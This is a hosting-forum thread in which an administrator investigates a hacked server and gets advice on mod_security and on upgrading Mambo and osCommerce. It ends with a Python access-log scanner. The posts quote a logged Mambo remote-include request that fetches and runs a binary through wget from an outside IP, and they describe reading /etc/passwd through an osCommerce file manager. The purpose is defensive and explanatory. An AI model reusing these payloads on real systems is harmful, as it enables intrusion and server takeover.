  1. #1
    Member
    Join Date
    May 2004
    Posts
    63

    HACKED again?!?!

    Hi all.

    Last December my server was hacked: a massive deface using the /tmp executable bug. After that we replaced the server with a new EV1 HD and cPanel image. We checked /tmp and it is set up as a partition in /etc/fstab with something like "/dev/hda3 /tmp ext3 defaults,noexec 1 0".

    Today, when I was running the top application (I usually run it while I'm working) I saw a ./pt process using lots of resources and running as nobody, I think it was nobody. I got in a panic and killed it immediately. I made a search over forums.cpanel.net and found that ./pt is maybe a hacking attempt. I got some strange IPs from Russia and Turkey (always the same) in the http logs and banned them from my machine. Finally I did an ls /etc and voila! a ./bc and psybnc files and directory... bc has run permissions. I removed those files but I have a question.... How can they run applications in /tmp if it is noexec? How do I know what was affected? How can they download applications to my server? Using mambo, oscommerce or phpbb (I usually patch phpbb)?

    I can't sleep till I know how they can get in and how I can protect my server!

    I found lots of
    PHP Code:
    /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo| 
    which seems like somebody is using a mambo bug to open URLs on another server where they are hacking...

    What can I do to avoid mass defaces?
    Kind regards!

  2. #2
    Member
    Join Date
    Oct 2002
    Posts
    751


    Quote Originally Posted by pcsousa
    php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|
    which seems like somebody is using a mambo bug to open URLs on another server where they are hacking...

    What can I do to avoid mass defaces?
    Kind regards!
    Do a forum search on mod_security, it's exactly what you need. Besides upgrading mambo of course.

  3. #3
    Member
    Join Date
    May 2004
    Posts
    63


    I think mambo is up to date... the "h" version I think. Maybe other users. I'm gonna install mod_security.

    ty.

  4. #4
    Member cLub2Share
    Join Date
    Oct 2003
    Posts
    114


    It seems to me like they use a shell account.. do you have safe mode enabled?

  5. #5
    cPanel Partner NOC AndyReed
    Join Date
    May 2004
    Location
    Minneapolis, MN
    Posts
    2,223


    Quote Originally Posted by pcsousa
    I think mambo is up to date... the "h" version I think. Maybe other users. I'm gonna install mod_security.
    Although Mod Security is great, it is not a substitute for strong OS and application security. Security is not a "set it and forget it" proposition. Because there are no absolutes, constant monitoring is essential. New attacks are being developed every day and if you're simply going to respond once an attack is discovered it's likely too late. Hackers will use any means to disguise other, more intrusive, exploits. In many cases simply waiting for obvious evidence that you've been hacked means you'll never know you've been hacked. In short, you need to ensure maximum security possible on your server.
    Andy Reed
    RHCE and CCNA
    ServerTune.com

  6. #6
    cPanel Product Evangelist Infopro
    Join Date
    May 2003
    Location
    Pennsylvania
    Posts
    7,894
    cPanel/Enkompass Access Level

    Root Administrator


    Quote Originally Posted by pcsousa
    I think mambo is up to date... the "h" version I think. Maybe other users. I'm gonna install mod_security.

    ty.
    Mambo was moved to Joomla a few months ago and has had several updates since that point. So if you're running Mambo I think you should upgrade it again.


    You'll do yourself good to hire a pro to help with securing your server as well.

    I recommend: http://www.configserver.com/

  7. #7
    Member
    Join Date
    Mar 2006
    Posts
    31


    Quote Originally Posted by pcsousa
    I think mambo is up to date... the "h" version I think. Maybe other users. I'm gonna install mod_security.

    ty.
    Yip, mambo is no use no more. Do yourself a favor and hire a server management company to secure your server. I highly recommend http://servertune.com
    Last edited by chirpy; 03-26-2006 at 09:33 AM.

  8. #8
    Member
    Join Date
    May 2004
    Posts
    63


    Thank you all for the suggestions.

    It seems they are using /admin/file_manager.php from the osCommerce application to read files inside the server (like /etc/passwd to know how many users you have, and the /home paths; check http://www.opennet.ru/base/cgi/1084898281_16.txt.html) and also to get files onto the server using wget. This /admin/ is a demo store, so there was no password protection. I've already removed it. Also I added the following text to mod_security:
    PHP Code:
    # WEB-PHP osCommerce bug
    SecFilter "filename=\.\./"
    (osCommerce by itself will not use "../"; also, do not forget to leave a blank line at the end of the Mod_Security configuration in cPanel, otherwise cPanel will show an error at the end of the edit page next time)


    Mambo is still developed, right? Joomla is a new community started because of Mambo's "stupid" royalties idea. Also, I saw those mambo references in the httpd logs but all of them returned 404 (not found) errors. It seems to be a kind of bug search, since for each sequence there are lots of URL tests (POST and GET), but all 404.
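    The two request shapes this thread turns on, the Mambo mosConfig_absolute_path remote include seen in post #1 and the osCommerce /admin/file_manager.php "filename=../" read from post #8, can both be picked out of an Apache access log by decoding the query string and checking the parameters the thread names. This is an added example, not code from the thread or from cPanel; the log lines are constructed (documentation IP addresses), and the indicator names are my own labels.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample Apache access-log lines modelled on the two request shapes discussed
# in this thread: the Mambo mosConfig_absolute_path remote include with a cmd= payload, and
# the osCommerce admin/file_manager.php "filename=../" read. Addresses are documentation IPs.
SAMPLE_LOG = """\
203.0.113.10 - - [26/Mar/2006:09:00:01 +0000] "GET /index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://198.51.100.7/cmd.gif?&cmd=cd%20/tmp;wget%20198.51.100.7/micu;chmod%20744%20micu;./micu HTTP/1.1" 404 289
203.0.113.10 - - [26/Mar/2006:09:00:02 +0000] "GET /catalog/admin/file_manager.php?action=read&filename=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1742
198.51.100.20 - - [26/Mar/2006:09:05:00 +0000] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
REMOTE_URL = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

def parse_query(query):
    """Split a query string on '&' only and percent-decode each key and value; done by hand
    rather than with parse_qsl so the ';' shell separators inside cmd=... stay in the value."""
    pairs = []
    for chunk in query.split('&'):
        key, _, val = chunk.partition('=')
        pairs.append((unquote_plus(key), unquote_plus(val)))
    return pairs

def classify_request(target):
    """Return the indicator names found in one request target (path + query)."""
    hits = []
    for key, val in parse_query(urlsplit(target).query):
        # Mambo/Joomla: config path replaced by a remote URL = remote file include
        if key == 'mosConfig_absolute_path' and REMOTE_URL.match(val):
            hits.append('mambo-rfi')
        # shell pipeline smuggled through a parameter (cd /tmp;wget ...;./micu)
        if key == 'cmd' and ';' in val:
            hits.append('cmd-injection')
        # osCommerce admin file manager: directory traversal in the filename parameter
        if key == 'filename' and '../' in val:
            hits.append('filename-traversal')
    return hits

def scan_log(text):
    """Return (client_ip, status, indicators) for every line carrying an indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            hits = classify_request(m.group('target'))
            if hits:
                findings.append((m.group('ip'), int(m.group('status')), hits))
    return findings
```

    Matching on the request rather than the response code is deliberate: the poster notes the Mambo probes all returned 404, and those lines still identify the scanning source and the parameters being tried.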
